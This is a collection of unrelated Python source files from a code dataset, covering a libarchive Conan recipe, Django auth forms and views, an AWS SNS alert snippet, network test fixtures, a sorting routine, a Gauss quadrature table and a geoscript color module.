"--without-bz2lib", "--without-iconv", "--without-lz4", "--without-lzma", "--without-lzo2",
"--without-nettle", "--without-openssl", "--without-xml2", "--without-expat"]
if self.options["shared"]:
configure_args += ["--enable-shared", "--disable-static"]
else:
configure_args += ["--disable-shared", "--enable-static"]
if self.options["fPIC"]:
configure_args += ["--with-pic"]
autotools.configure(configure_dir="libarchive-3.3.3", vars=env_build_vars,
args=configure_args)
autotools.make(vars=env_build_vars)
autotools.install(vars=env_build_vars)
def package_info(self):
self.cpp_info.libs = ["archive"]
self.cpp_info.builddirs = ["lib/pkgconfig/"]
| StarcoderdataPython |
131452 | <filename>test.py
# coding: utf-8
f = open('input_names.txt', 'r', encoding='utf-8')
content = f.read()
f.close()
from inference_helper import InferenceHelper
infer_helper = InferenceHelper()
infer_helper.init(model_path='models/NER_cn_names_artificial_data_0.9830_0.9821_14.h5', mode='name', timeit=False, mute=True)
#infer_helper.init(model_path='models/NER_cn_names_artificial_data_0.9740_0.9727_3.h5', mode='name', timeit=False, mute=True)
def infer(s):
sentences, tags = infer_helper.infer(s)
if len(sentences) > 0 and len(tags.keys()) > 0:
tokens = sentences[0]['tokens']
bios = tags[list(tags.keys())[0]][0]
out_str = ''
name = ''
for i in range(len(tokens)):
c = tokens[i]
if name == '':
if bios[i] == 'B-NAME':
name += c
out_str += '['
out_str += c
elif bios[i] == 'I-NAME':
name += c
out_str += c
else:
out_str += ']' + c
name = ''
if name != '':
out_str += ']'
print(out_str)
| StarcoderdataPython |
1774381 | # Send out alerts based on a conditional statement
# If there are over 100 potholes, create a message
if streets_v_count > 100:
# The message should contain the number of potholes.
message = "There are {} potholes!".format(streets_v_count)
# The email subject should also contain number of potholes
subject = "Latest pothole count is {}".format(streets_v_count)
# Publish the email to the streets_critical topic
sns.publish(
TopicArn = str_critical_arn,
# Set subject and message
Message = message,
Subject = subject
)
# Send one of messages. If the messages are required more often then a subscription topic would be required
# Loop through every row in contacts
for idx, row in contacts.iterrows():
# Publish an ad-hoc sms to the user's phone number
response = sns.publish(
# Set the phone number
PhoneNumber = str(row['Phone']),
# The message should include the user's name
Message = 'Hello {}'.format(row['Name'])
)
print(response)
| StarcoderdataPython |
1635028 | <gh_stars>0
######################################
# Django 模块
######################################
from django import forms
######################################
# 自定义模块
######################################
# from .forms import *
######################################
# 用户登录表单
######################################
class UerLoginForm(forms.Form):
username = forms.CharField(max_length=20, min_length=4, required=True)
password = forms.CharField(max_length=20, min_length=6, required=True)
######################################
# 用户忘记密码表单
######################################
class UserForgetPasswordForm(forms.Form):
email = forms.EmailField(required=True)
######################################
# 修改用户信息表单
######################################
class ChangeUserInfoForm(forms.Form):
user_name = forms.CharField(max_length=10)
mobile = forms.CharField(max_length=20, required=False)
gender = forms.IntegerField()
# position = forms.ForeignKey(UserPosition, verbose_name='职位', on´_delete=forms.CASCADE, required=False)
comment = forms.CharField(max_length=200, required=False)
######################################
# 修改用户密码表单
######################################
class ChangeUserPasswordForm(forms.Form):
cur_password = forms.CharField(min_length=6, max_length=20, required=True)
new_password = forms.CharField(min_length=6, max_length=20, required=True)
renew_password = forms.CharField(min_length=6, max_length=20, required=True)
######################################
# 添加单位表单
######################################
class AddUnitForm(forms.Form):
name = forms.CharField(max_length=30,required=True)
connect = forms.CharField(max_length=30,required=False)
connect_phone = forms.CharField(max_length=30,required=False)
comment = forms.CharField( max_length=200,required=False)
address = forms.CharField( max_length=50,required=False)
######################################
# 修改单位表单
######################################
class EditUnitForm(forms.Form):
name = forms.CharField(max_length=30,required=True)
connect = forms.CharField(max_length=30,required=False)
connect_phone = forms.CharField(max_length=30,required=False)
comment = forms.CharField( max_length=200,required=False)
address = forms.CharField( max_length=50,required=False)
######################################
# 添加部门表单
######################################
class AddDeptForm(forms.Form):
name = forms.CharField(max_length=20,required=True)
connect = forms.CharField(max_length=30,required=False)
connect_phone = forms.CharField( max_length=30,required=False)
comment = forms.CharField(max_length=1000,required=False)
######################################
# 修改部门表单
######################################
class EditDeptForm(forms.Form):
name = forms.CharField(max_length=20,required=True)
connect = forms.CharField(max_length=30,required=False)
connect_phone = forms.CharField( max_length=30,required=False)
comment = forms.CharField( max_length=1000,required=False)
######################################
# 添加用户表单
######################################
class AddUserForm(forms.Form):
user_name = forms.CharField(max_length=20, required=True)
# mobile = forms.CharField(min_length=6, max_length=20, required=True)
# password = forms.CharField(min_length=6, max_length=20, required=True)
######################################
# 修改用户表单
######################################
class EditUserForm(forms.Form):
user_name = forms.CharField(max_length=20, required=True)
| StarcoderdataPython |
3200693 | from boa3.builtin import public
from boa3_test.test_sc.import_test.FromImportUserModuleRecursiveImport import from_import_empty_list
@public
def empty_list() -> list:
return from_import_empty_list()
| StarcoderdataPython |
4833669 | <filename>libsortvis/algos/selectionsort.py
def selectionsort(lst):
for j in range(len(lst)-1, -1, -1):
m = lst.index(max(lst[:j+1])) # No, this is not efficient ;)
lst[m], lst[j] = lst[j], lst[m]
if m != j:
lst.log()
| StarcoderdataPython |
3367687 | <filename>tests/layer1/test_layer1_uhd.py<gh_stars>1-10
import pytest
@pytest.fixture
def ixn_session(api):
api.set_config(api.config())
ixn = api.assistant.Session.Ixnetwork
return ixn
@pytest.mark.l1_manual
@pytest.mark.parametrize(
"speed",
[
"speed_100_gbps",
"speed_40_gbps",
"speed_25_gbps",
"speed_10_gbps",
"speed_50_gbps",
],
)
def test_layer1_uhd(api, ixn_session, utils, speed):
"""
Layer1 test specific to UHD devices.
script will fetch the port location and figure out the card group,
then configures the port with supported speed in each test iteration.
Validation: validate the speed configured and the fanout ports via
restpy.
"""
chassis = ixn_session.AvailableHardware.Chassis.find()
if chassis.ChassisType != "Ixia UHD":
pytest.skip("Skipping as the chassis is not UHD")
port = utils.settings.ports[0].split("/")[-1]
config = api.config()
res_map, index = get_resource(chassis, speed, port)
port = "localuhd/" + res_map[speed][0][0]
assert res_map is not None
p1 = config.ports.port(name="p1", location=port)[-1]
l1 = config.layer1.layer1()[-1]
l1.port_names = [p1.name]
l1.speed = speed
l1.media = utils.settings.media
l1.auto_negotiate = True
l1.ieee_media_defaults = False
l1.auto_negotiation.link_training = False
l1.auto_negotiation.rs_fec = True
api.set_config(config)
card = chassis.Card.find()[index]
assert card.Aggregation.find().Mode == res_map[speed][-1]
assert len(card.Aggregation.find().ActivePorts) == len(res_map[speed][0])
def get_resource(chassis, speed, port):
res_map = get_speed_to_resource_map(chassis)
for mod in res_map:
for p in res_map[mod][speed][0]:
import re
if re.match("^%s" % port, p):
return (res_map[mod], mod)
return None
def get_speed_to_resource_map(chassis):
rg_map = {
"uhdOneHundredEightByHundredGigNonFanOut": {
"name": "speed_100_gbps",
"fanout": 8,
},
"uhdOneHundredEightByFortyGigNonFanOut": {
"name": "speed_40_gbps",
"fanout": 8,
},
"uhdOneHundredThirtyTwoByTwentyFiveGigFanOut": {
"name": "speed_25_gbps",
"fanout": 32,
},
"uhdOneHundredThirtyTwoByTenGigFanOut": {
"name": "speed_10_gbps",
"fanout": 32,
},
"uhdOneHundredSixteenByFiftyGigFanOut": {
"name": "speed_50_gbps",
"fanout": 16,
},
}
ret = dict()
cards = chassis.Card.find()
non_fanout = 8
for i, card in enumerate(cards):
if not card.AggregationSupported:
continue
modes = card.Aggregation.find().AvailableModes
val = dict()
stop = (non_fanout * (i + 1)) + 1
start = (non_fanout * i) + 1
for m in modes:
if m not in rg_map:
continue
fan = int(rg_map[m]["fanout"] / non_fanout)
if fan > 1:
val[rg_map[m]["name"]] = (
[
"{}.{}".format(x, d)
for x in range(start, stop)
for d in range(1, fan + 1)
],
m,
)
else:
val[rg_map[m]["name"]] = (
[str(x) for x in range(start, stop)],
m,
)
ret[i] = val
return ret
| StarcoderdataPython |
3200401 | <filename>tests/conftest.py<gh_stars>10-100
# -*- coding: utf-8 -*-
import sys, os
import pytest
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from multiset import Multiset, FrozenMultiset
@pytest.fixture(autouse=True)
def add_default_expressions(doctest_namespace):
doctest_namespace['Multiset'] = Multiset
doctest_namespace['FrozenMultiset'] = FrozenMultiset
def pytest_generate_tests(metafunc):
if 'MultisetCls' in metafunc.fixturenames:
metafunc.parametrize('MultisetCls', ['frozen', 'regular'], indirect=True)
@pytest.fixture
def MultisetCls(request):
if request.param == 'frozen':
return FrozenMultiset
elif request.param == 'regular':
return Multiset
else:
raise ValueError("Invalid internal test config")
| StarcoderdataPython |
156441 | <filename>tests/core/test_peers.py
import random
from pyslab.core.types import Cell
from pyslab.core.peers import (
row_peer_cells,
column_peer_cells,
box_peer_cells,
all_peer_cells,
)
def test_correct_row_peers():
peer_cols = list(range(9))
random.shuffle(peer_cols)
col = peer_cols.pop()
row = random.randint(0, 8)
peers = row_peer_cells(Cell(row, col))
assert [Cell(row, c) for c in sorted(peer_cols)] == peers
def test_correct_column_peers():
peer_rows = list(range(9))
random.shuffle(peer_rows)
row = peer_rows.pop()
col = random.randint(0, 8)
peers = column_peer_cells(Cell(row, col))
assert [Cell(r, col) for r in sorted(peer_rows)] == peers
def test_correct_box_peers():
peers = box_peer_cells(Cell(3, 3))
assert [
Cell(r, c) for r in range(3, 6) for c in range(3, 6) if not (r == c == 3)
] == peers
def test_correct_all_peers():
peers = all_peer_cells(Cell(0, 3))
assert sorted(peers) == sorted(
list(
{(0, c) for c in range(9) if c != 3}
.union((r, 3) for r in range(9) if r != 0)
.union({(1, 4), (1, 5), (2, 4), (2, 5)})
)
)
| StarcoderdataPython |
3327034 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 20 12:10:54 2018
@author: thiagoalmeida
"""
class TabelaGauss():
#fonte: http://www.profwillian.com/calcnum/Legendre.htm
n2 = [
[-0.5773502691, 1.0000000000],
[0.5773502691, 1.0000000000]
]
n3 = [
[-0.7745966692, 0.5555555555],
[0.0000000000, 0.8888888888],
[0.7745966692, 0.5555555555]
]
n4 = [
[-0.8611363115, 0.3478548451],
[-0.3399810435, 0.6521451548],
[0.3399810435, 0.6521451548],
[0.8611363115, 0.3478548451]
]
n5 = [
[-0.9061798459, 0.2369268850],
[-0.5384693101, 0.4786286704],
[0.0000000000, 0.5688888888],
[0.5384693101, 0.4786286704],
[0.9061798459, 0.2369268850]
]
n6 = [
[-0.9324695142, 0.1713244923],
[-0.6612093864, 0.3607615730],
[-0.2386191860, 0.4679139345],
[0.2386191860, 0.4679139345],
[0,6612093864, 0.3607615730],
[0.9324695142, 0.1713244923]
]
n7 = [
[-0.9491079123, 0.1294849661],
[-0.7415311855, 0.2797053914],
[-0.4058451513, 0.3818300505],
[0.0000000000, 0.4179591836],
[0.4058451513, 0.3818300505],
[0.7415311855, 0.2797053914],
[0.9491079123, 0.1294849661]
]
n8 = [
[-0.9602898564, 0.1012285362],
[-0,7966664774, 0.2223810344],
[-0.5255324099, 0.3137066458],
[-0.1834346424, 0.3626837833],
[0.1834346424, 0.3626837833],
[0.5255324099, 0.3137066458],
[0.7966664774, 0.2223810344],
[0.9602898564, 0.1012285362]
]
#agrupa as matrizes de pontos
pontos = [n2, n3, n4, n5, n6, n7, n8]
def getValores(self, n):
if(n>=2 and n<=8):
return self.pontos[n-2]
| StarcoderdataPython |
3331674 | import json
from django.urls import reverse
from django.contrib import messages
from django.utils.encoding import force_text
from django.contrib.auth import login, logout
from django.utils.http import urlsafe_base64_decode
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import RedirectView, FormView, TemplateView
from .backends import EmailModelBackend
from .forms import (LoginForm, SignUpForm, OTPForm, FPEmailForm,
ChangePasswordForm)
from .models import (BaseUserProfile, OTPVerification,
VerificationLink, ForgotPasswordLink)
from .tasks import create_forgot_password_link
# Create your views here.
class IndexView(LoginRequiredMixin, TemplateView):
"""
Home view for user after redirection
"""
template_name = 'frontend/dashboard.html'
def get_context_data(self, **kwargs):
context = super(IndexView, self).get_context_data(**kwargs)
context['dashboard_page'] = "active"
user = self.request.user
context['email_verified'] = user.email_verified
return context
class LoginView(FormView):
"""
This view handles authentication of the user, when they first time logs in
redirects them to login page if not authenticated.
"""
form_class = LoginForm
template_name = 'frontend/login.html'
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
return context
def post(self, request):
form = LoginForm(request.POST)
email = form.data['email']
password = form.data['password']
if form.is_valid():
user_auth = EmailModelBackend()
user = user_auth.validate_password(password=password, email=email)
if user:
otp_id = OTPVerification.objects.get(user=user).id
return HttpResponseRedirect(
reverse('phone-verification-view') + f"?otp_id={otp_id}")
context = {
'form': form,
"csrf_token": form.data['csrfmiddlewaretoken'], 'email': email
}
return render(
request, context=context, template_name=self.template_name)
class LogOutView(RedirectView):
"""
logout view
"""
def get_redirect_url(self):
url = reverse("login-view")
logout(self.request)
return url
class SignupView(FormView):
"""
This view signs up new user and validates the form on the server side
"""
form_class = SignUpForm
template_name = 'frontend/sign-up.html'
def post(self, request, *args, **kwargs):
form = SignUpForm(request.POST)
email = form.data['email']
password = form.data['password']
if form.is_valid():
user = form.save()
otp_id = OTPVerification.objects.get(user=user).id
return HttpResponseRedirect(
reverse('phone-verification-view') + f"?otp_id={otp_id}")
context = {
'form': form, "csrf_token": form.data['csrfmiddlewaretoken'],
'email': email
}
return render(
request, context=context, template_name=self.template_name)
class OTPView(FormView):
"""
This view handles otp verification
"""
form_class = OTPForm
template_name = 'frontend/otp.html'
def get_context_data(self, **kwargs):
context = super(OTPView, self).get_context_data(**kwargs)
otp_id = self.request.GET.get('otp_id')
context["otp_id"] = otp_id
get_object_or_404(OTPVerification, id=otp_id)
return context
def post(self, request, *args, **kwargs):
form = OTPForm(request.POST)
otp = form.data['otp']
otp_id = form.data['otp_id']
if not form.is_valid():
context = {
'form': form, "csrf_token": form.data['csrfmiddlewaretoken'],
'otp_id': otp_id}
return render(
request, context=context, template_name=self.template_name)
else:
otp_verified = get_object_or_404(OTPVerification, id=otp_id)
user_auth = EmailModelBackend()
user = user_auth.authenticate(_id=otp_id, otp=otp)
if user:
login(self.request, user)
if "next" in self.request.GET:
url = self.request.GET["next"]
response = HttpResponseRedirect(url)
return response
else:
response = HttpResponseRedirect('/home')
return response
else:
messages.error(self.request, "Incorrect OTP entered")
return HttpResponseRedirect(
reverse('phone-verification-view') + f"?otp_id={otp_id}")
class LinkExpireView(TemplateView):
"""
This view is to redirect user after confirming email
"""
template_name = 'frontend/link-expire.html'
class VerifyLinkView(TemplateView):
template_name = "frontend/verification.html"
def dispatch(self, request, *args, **kwargs):
if not VerificationLink.objects.filter(hash_key=self.kwargs["slug"]).exists():
return HttpResponseRedirect(reverse("link-expire-view"))
return super(VerifyLinkView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(VerifyLinkView, self).get_context_data(**kwargs)
slug = self.kwargs["slug"]
context["link"] = get_object_or_404(VerificationLink, hash_key=slug)
email = force_text(urlsafe_base64_decode(slug))
BaseUserProfile.objects.filter(email=user_id).update(
is_active=True, email_verified=True)
VerificationLink.objects.filter(hash_key=slug).delete()
return context
class ForgotPasswordView(FormView):
"""
This view confirms email for forgot password
"""
form_class = FPEmailForm
template_name = 'frontend/send-fp-mail.html'
def post(self, request, *args, **kwargs):
form = FPEmailForm(request.POST)
if not form.is_valid():
context = {
'form': form, "csrf_token": form.data['csrfmiddlewaretoken'], }
return render(
request, context=context, template_name=self.template_name)
email = form.data['email']
messages.error(self.request, "If your email exists in our database\
we will send your link to change your password")
create_forgot_password_link.delay(email)
return HttpResponseRedirect(reverse('forgot-password-view'))
class ForgotPasswordLinkView(FormView):
"""
This view confirms email for forgot password
"""
form_class = ChangePasswordForm
template_name = 'frontend/forgot-password.html'
def dispatch(self, request, *args, **kwargs):
if not ForgotPasswordLink.objects.filter(hash_key=self.kwargs["slug"]).exists():
return HttpResponseRedirect(reverse("link-expire-view"))
return super(ForgotPasswordLinkView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ForgotPasswordLinkView, self).get_context_data(**kwargs)
slug = self.kwargs["slug"]
get_object_or_404(ForgotPasswordLink, hash_key=slug)
return context
def post(self, request, *args, **kwargs):
form = ChangePasswordForm(request.POST)
if not form.is_valid():
context = {
'form': form, "csrf_token": form.data['csrfmiddlewaretoken'], }
return render(
request, context=context, template_name=self.template_name)
slug = self.kwargs["slug"]
email = force_text(urlsafe_base64_decode(slug))
if BaseUserProfile.objects.filter(email=email).exists():
user = BaseUserProfile.objects.filter(email=email).first()
user.set_password(form.data['password'])
user.save()
ForgotPasswordLink.objects.filter(hash_key=slug).delete()
messages.error(self.request, "We have updated your password")
return render(
request, template_name=self.template_name)
| StarcoderdataPython |
1617530 | # Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import time
import unittest
from rlgraph.environments import OpenAIGymEnv
from rlgraph.agents import IMPALAAgent
from rlgraph.spaces import FloatBox
from rlgraph.utils import root_logger
from rlgraph.tests.test_util import config_from_path
class TestIMPALAAgentLongTaskLearning(unittest.TestCase):
"""
Tests whether the DQNAgent can learn in tough environments.
"""
root_logger.setLevel(level=logging.INFO)
#atari_preprocessed_state_space = FloatBox(shape=(80, 80, 4), add_batch_rank=True)
#atari_preprocessing_spec = [
# dict(type="image_crop", x=0, y=25, width=160, height=160),
# dict(type="image_resize", width=80, height=80),
# dict(type="grayscale", keep_rank=True),
# dict(type="divide", divisor=255,),
# dict(type="sequence", sequence_length=4, batch_size=1, add_rank=False)
#]
def test_impala_on_outbreak(self):
"""
Creates a DQNAgent and runs it via a Runner on an openAI Pong Env.
"""
env = OpenAIGymEnv("Breakout-v0", frameskip=4, max_num_noops=30, episodic_life=True, visualize=False)
config_ = config_from_path("configs/impala_agent_for_breakout.json")
agent = IMPALAAgent.from_spec(
config_,
state_space=env.state_space,
action_space=env.action_space,
)
learn_updates = 4000000
mean_returns = []
for i in range(learn_updates):
ret = agent.update()
mean_return = self._calc_mean_return(ret)
mean_returns.append(mean_return)
print("i={} Loss={:.4} Avg-reward={:.2}".format(i, float(ret[1]), mean_return))
time.sleep(3)
agent.terminate()
time.sleep(3)
@staticmethod
def _calc_mean_return(records):
size = records[3]["rewards"].size
rewards = records[3]["rewards"].reshape((size,))
terminals = records[3]["terminals"].reshape((size,))
returns = list()
return_ = 0.0
for r, t in zip(rewards, terminals):
return_ += r
if t:
returns.append(return_)
return_ = 0.0
return np.mean(returns)
| StarcoderdataPython |
1660469 | <filename>geoscript/style/color.py
import string
from java import awt, lang
from geoscript.style.expression import Expression
from geoscript import util
_colors = {}
_colors['aliceblue'] = awt.Color(240,248,255)
_colors['antiquewhite'] = awt.Color(250,235,215)
_colors['aqua'] = awt.Color(0,255,255)
_colors['aquamarine'] = awt.Color(127,255,212)
_colors['azure'] = awt.Color(240,255,255)
_colors['beige'] = awt.Color(245,245,220)
_colors['bisque'] = awt.Color(255,228,196)
_colors['black'] = awt.Color(0,0,0)
_colors['blanchedalmond'] = awt.Color(255,235,205)
_colors['blue'] = awt.Color(0,0,255)
_colors['blueviolet'] = awt.Color(138,43,226)
_colors['brown'] = awt.Color(165,42,42)
_colors['burlywood'] = awt.Color(222,184,135)
_colors['cadetblue'] = awt.Color(95,158,160)
_colors['chartreuse'] = awt.Color(127,255,0)
_colors['chocolate'] = awt.Color(210,105,30)
_colors['coral'] = awt.Color(255,127,80)
_colors['cornflowerblue'] = awt.Color(100,149,237)
_colors['cornsilk'] = awt.Color(255,248,220)
_colors['crimson'] = awt.Color(220,20,60)
_colors['cyan'] = awt.Color(0,255,255)
_colors['darkblue'] = awt.Color(0,0,139)
_colors['darkcyan'] = awt.Color(0,139,139)
_colors['darkgoldenrod'] = awt.Color(184,134,11)
_colors['darkgray'] = awt.Color(169,169,169)
_colors['darkgreen'] = awt.Color(0,100,0)
_colors['darkkhaki'] = awt.Color(189,183,107)
_colors['darkmagenta'] = awt.Color(139,0,139)
_colors['darkolivegreen'] = awt.Color(85,107,47)
_colors['darkorange'] = awt.Color(255,140,0)
_colors['darkorchid'] = awt.Color(153,50,204)
_colors['darkred'] = awt.Color(139,0,0)
_colors['darksalmon'] = awt.Color(233,150,122)
_colors['darkseagreen'] = awt.Color(143,188,143)
_colors['darkslateblue'] = awt.Color(72,61,139)
_colors['darkslategray'] = awt.Color(47,79,79)
_colors['darkturquoise'] = awt.Color(0,206,209)
_colors['darkviolet'] = awt.Color(148,0,211)
_colors['deeppink'] = awt.Color(255,20,147)
_colors['deepskyblue'] = awt.Color(0,191,255)
_colors['dimgray'] = awt.Color(105,105,105)
_colors['dodgerblue'] = awt.Color(30,144,255)
_colors['firebrick'] = awt.Color(178,34,34)
_colors['floralwhite'] = awt.Color(255,250,240)
_colors['forestgreen'] = awt.Color(34,139,34)
_colors['fuchsia'] = awt.Color(255,0,255)
_colors['gainsboro'] = awt.Color(220,220,220)
_colors['ghostwhite'] = awt.Color(248,248,255)
_colors['gold'] = awt.Color(255,215,0)
_colors['goldenrod'] = awt.Color(218,165,32)
_colors['gray'] = awt.Color(128,128,128)
_colors['green'] = awt.Color(0,128,0)
_colors['greenyellow'] = awt.Color(173,255,47)
_colors['grey'] = awt.Color(84,84,84)
_colors['honeydew'] = awt.Color(240,255,240)
_colors['hotpink'] = awt.Color(255,105,180)
_colors['indianred'] = awt.Color(205,92,92)
_colors['indigo'] = awt.Color(75,0,130)
_colors['ivory'] = awt.Color(255,255,240)
_colors['khaki'] = awt.Color(240,230,140)
_colors['lavender'] = awt.Color(230,230,250)
_colors['lavenderblush'] = awt.Color(255,240,245)
_colors['lawngreen'] = awt.Color(124,252,0)
_colors['lemonchiffon'] = awt.Color(255,250,205)
_colors['lightblue'] = awt.Color(173,216,230)
_colors['lightcoral'] = awt.Color(240,128,128)
_colors['lightcyan'] = awt.Color(224,255,255)
_colors['lightgoldenrodyellow'] = awt.Color(250,250,210)
_colors['lightgrey'] = awt.Color(211,211,211)
_colors['lightgreen'] = awt.Color(144,238,144)
_colors['lightpink'] = awt.Color(255,182,193)
_colors['lightsalmon'] = awt.Color(255,160,122)
_colors['lightseagreen'] = awt.Color(32,178,170)
_colors['lightskyblue'] = awt.Color(135,206,250)
_colors['lightslategray'] = awt.Color(119,136,153)
_colors['lightsteelblue'] = awt.Color(176,196,222)
_colors['lightyellow'] = awt.Color(255,255,224)
_colors['lime'] = awt.Color(0,255,0)
_colors['limegreen'] = awt.Color(50,205,50)
_colors['linen'] = awt.Color(250,240,230)
_colors['magenta'] = awt.Color(255,0,255)
_colors['maroon'] = awt.Color(128,0,0)
_colors['mediumaquamarine'] = awt.Color(102,205,170)
_colors['mediumblue'] = awt.Color(0,0,205)
_colors['mediumorchid'] = awt.Color(186,85,211)
_colors['mediumpurple'] = awt.Color(147,112,216)
_colors['mediumseagreen'] = awt.Color(60,179,113)
_colors['mediumslateblue'] = awt.Color(123,104,238)
_colors['mediumspringgreen'] = awt.Color(0,250,154)
_colors['mediumturquoise'] = awt.Color(72,209,204)
_colors['mediumvioletred'] = awt.Color(199,21,133)
_colors['midnightblue'] = awt.Color(25,25,112)
_colors['mintcream'] = awt.Color(245,255,250)
_colors['mistyrose'] = awt.Color(255,228,225)
_colors['moccasin'] = awt.Color(255,228,181)
_colors['navajowhite'] = awt.Color(255,222,173)
_colors['navy'] = awt.Color(0,0,128)
_colors['oldlace'] = awt.Color(253,245,230)
_colors['olive'] = awt.Color(128,128,0)
_colors['olivedrab'] = awt.Color(107,142,35)
_colors['orange'] = awt.Color(255,165,0)
_colors['orangered'] = awt.Color(255,69,0)
_colors['orchid'] = awt.Color(218,112,214)
_colors['palegoldenrod'] = awt.Color(238,232,170)
_colors['palegreen'] = awt.Color(152,251,152)
_colors['paleturquoise'] = awt.Color(175,238,238)
_colors['palevioletred'] = awt.Color(216,112,147)
_colors['papayawhip'] = awt.Color(255,239,213)
_colors['peachpuff'] = awt.Color(255,218,185)
_colors['peru'] = awt.Color(205,133,63)
_colors['pink'] = awt.Color(255,192,203)
_colors['plum'] = awt.Color(221,160,221)
_colors['powderblue'] = awt.Color(176,224,230)
_colors['purple'] = awt.Color(128,0,128)
_colors['red'] = awt.Color(255,0,0)
_colors['rosybrown'] = awt.Color(188,143,143)
_colors['royalblue'] = awt.Color(65,105,225)
_colors['saddlebrown'] = awt.Color(139,69,19)
_colors['salmon'] = awt.Color(250,128,114)
_colors['sandybrown'] = awt.Color(244,164,96)
_colors['seagreen'] = awt.Color(46,139,87)
_colors['seashell'] = awt.Color(255,245,238)
_colors['sienna'] = awt.Color(160,82,45)
_colors['silver'] = awt.Color(192,192,192)
_colors['skyblue'] = awt.Color(135,206,235)
_colors['slateblue'] = awt.Color(106,90,205)
_colors['slategray'] = awt.Color(112,128,144)
_colors['snow'] = awt.Color(255,250,250)
_colors['springgreen'] = awt.Color(0,255,127)
_colors['steelblue'] = awt.Color(70,130,180)
_colors['tan'] = awt.Color(210,180,140)
_colors['teal'] = awt.Color(0,128,128)
_colors['thistle'] = awt.Color(216,191,216)
_colors['tomato'] = awt.Color(255,99,71)
_colors['turquoise'] = awt.Color(64,224,208)
_colors['violet'] = awt.Color(238,130,238)
_colors['wheat'] = awt.Color(245,222,179)
_colors['white'] = awt.Color(255,255,255)
_colors['whitesmoke'] = awt.Color(245,245,245)
_colors['yellow'] = awt.Color(255,255,0)
_colors['yellowgreen'] = awt.Color(154,205,50)
class Color(Expression):
"""
Expression that evaluates to a color object.
The `val` argument may be specified as an rgba tuple:
>>> Color((255, 0, 255))
(255,0,255)
Or as a hex color string:
>>> Color('ff00ff')
(255,0,255)
Or as a well known color name:
>>> Color('magenta')
(255,0,255)
"""
def __init__(self, val):
Expression.__init__(self, val)
def _expr(self, val):
if isinstance(val, Expression):
# direct expression specified
return val.expr
else:
# transform val to color
if isinstance(val, awt.Color):
# try direct awt color
col = val
elif _colors.has_key(val):
# try well known
col = _colors[val]
elif isinstance(val,(list,tuple)):
# try as tuple
col = awt.Color(*val)
elif isinstance(val, (str,unicode)):
# look up wellknown
if hasattr(awt.Color, string.upper(val)):
col = getattr(awt.Color, string.upper(val))
else:
# try as hex string
val = val[1:] if val[0] == "#" else val
# convert 3 digit to 6
if len(val) == 3:
val = ''.join([val[i]+val[i] for i in range(0,3)])
# support 8 and 6 digit
if len(val) == 8:
# move alpha to end
val = val[2:] + val[:2]
col = awt.Color(*[int('0x'+x,0)
for x in [val[i:i+2] for i in range(0, len(val), 2)]])
#for x in val[0:2],val[2:4],val[4:6]])
else:
# default
col = awt.Color(0,0,0)
return self.factory.filter.literal(col)
def __repr__(self):
return "(%d,%d,%d)" % self.rgb
def _getcolor(self):
return self.expr.evaluate(awt.Color)
_color = property(_getcolor)
def getrgb(self):
col = self._color
return (col.red, col.green, col.blue)
rgb = property(getrgb,None,None,"The RGB value of the color")
def getrgba(self):
col = self._color
return (col.red, col.green, col.blue, col.alpha)
rgba = property(getrgba,None,None,"The RGBA value of the color")
def getargb(self):
col = self._color
return (col.alpha, col.red, col.green, col.blue)
argb = property(getrgba,None,None,"The ARGB value of the color")
def gethex(self):
return self._tohex(self.rgb)
hex = property(gethex,None,None,"The hex value of the color")
def getahex(self):
return self._hex(self.argb)
ahex = property(gethex,None,None,"The hex value, with alpha, of the color")
def _tohex(self, vals):
return ''.join([lang.String.format('%02x', x) for x in vals])
def gethsl(self):
r,g,b = [x/255.0 for x in self.rgb]
lo, hi = min(r,g,b), max(r,g,b)
h = s = l = (lo+hi)/2.0
if lo == hi:
h = s = 0 # achromatic
else:
d = float(hi - lo);
s = d / (2-hi-lo) if l > 0.5 else d / (hi+lo)
h = {
r: lambda x: (g - b) / d + (6 if g < b else 0),
g: lambda x: (b - r) / d + 2,
b: lambda x: (r - g) / d + 4
}[hi](-1)
h /= 6.0;
return [x for x in [h, s, l]];
hsl = property(gethsl,None,None,"The HSL/HLS value of the color")
def opacity(self, o):
return self.alpha(int(255*o))
def alpha(self, a):
return Color(tuple(list(self.rgb) + [a]))
def interpolate(self, color, n=10, method='linear'):
"""
Interpolates a set of color values beteen this color and the specified
*color*.
The *n* parameter specifies how many values to interpolate, specifically the
number of classes resulting from the interpolation. The interpolation is
inclusive of this and the specified color and returns a list of *n*+1
values.
"""
color = Color(color)
hsl1,hsl2 = self.hsl, color.hsl
dhsl = map(lambda x: x[1]-x[0], zip(hsl1,hsl2))
colors = [Color.fromHSL(map(lambda x,y: x + (r/float(n))*y,hsl1,dhsl))
for r in util.interpolate(0, n, n, method)]
if self._color.alpha != color._color.alpha:
alphas = util.interpolate(self._color.alpha,color._color.alpha,n,method)
colors = map(lambda (c,a): c.alpha(int(a)), zip(colors, alphas))
return colors
@classmethod
def fromHSL(cls, hsl):
"""
Creates a color object from the HSL/HLS value.
"""
h,s,l = hsl
if s == 0:
r = g = b = l # achromatic
else:
q = l * (1+s) if l < 0.5 else l + s - l * s;
p = 2 * l - q
#var q = l < 0.5 ? l * (1 + s) : l + s - l * s;
#var p = 2 * l - q;
r = Color._hue2rgb(p, q, h + 1/3.0)
g = Color._hue2rgb(p, q, h);
b = Color._hue2rgb(p, q, h - 1/3.0);
return Color(tuple([int(round(255*x)) for x in [r,g,b]]))
@classmethod
def random(cls, n):
"""
Returns a generator of random colors.
*n* is the number of colors to generate.
"""
